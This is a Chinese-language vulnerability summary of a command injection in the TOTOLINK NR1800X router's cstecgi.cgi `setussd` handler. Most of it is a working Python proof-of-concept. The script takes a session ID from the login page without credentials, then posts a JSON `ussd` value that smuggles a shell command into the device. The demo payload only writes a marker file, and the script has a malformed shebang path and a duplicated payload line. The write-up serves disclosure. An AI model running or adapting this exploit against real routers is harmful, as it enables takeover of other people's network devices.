# TOTOLINK NR1800X 命令注入漏洞总结 ## 漏洞概述 在 `cstecgi.cgi` 的 `setussd` 处理路径中,`ussd` 参数被直接拼接进命令字符串并传递给 `system` 执行,导致命令注入风险。 ## 影响范围 * **厂商**: TOTOLINK * **受影响产品**: CB34FR-1C (NR1800X) * **受影响固件版本**: V9.1.0u.6279_B20210910 (本地实验室观察到) ## 修复方案 * 页面未提供具体的修复方案或补丁链接。 * 建议厂商对 `cstecgi.cgi` 中的 `ussd` 参数进行严格的输入过滤或转义处理,避免直接拼接至系统命令中。 ## POC 代码 ```python #!/usr/bin/bin/env python3 import json import re import socket TARGET = "192.168.211.128" PORT = 80 LOGIN_PATH = "/formLoginAuth.htm?authCode=&action=login" CGI_PATH = "/cgi-bin/cstecgi.cgi" def send_raw(req: bytes) -> bytes: with socket.create_connection((TARGET, PORT), timeout=3) as s: s.sendall(req) s.settimeout(3) chunks = [] while True: try: chunk = s.recv(4096) if not chunk: break chunks.append(chunk) except socket.timeout: break return b"".join(chunks) def get_session_id() -> str: req = ( f"GET {LOGIN_PATH} HTTP/1.1\r\n" f"Host: {TARGET}\r\n" f"Connection: close\r\n\r\n" ).encode() data = send_raw(req).decode(errors="ignore") m = re.search(r"SESSION_ID=([^\r\n]*)", data) return m.group(1) if m else "" def verify_set_ussd(session_id: str) -> str: cmd_payload = "# ; echo 'Congratulations on executing the command' > /tmp/ussd_success;" cmd_payload += "# ; echo 'Congratulations on executing the command' > /tmp/ussd_success;" body = json.dumps({"topicurl": "setussd", "ussd": cmd_payload}, separators=(",", ":")) req = ( f"POST {CGI_PATH} HTTP/1.1\r\n" f"Host: {TARGET}\r\n" f"Content-Type: application/json\r\n" f"Content-Length: {len(body.encode())}\r\n" f"Cookie: SESSION_ID={session_id}\r\n" f"Connection: close\r\n\r\n" f"{body}" ).encode() data = send_raw(req).decode(errors="ignore") return data.split("\r\n", 1)[0] if data else "NO_RESPONSE" if __name__ == "__main__": sid = get_session_id() if not sid: print("[FAILED] no SESSION_ID") else: print(verify_set_ussd(sid)) ```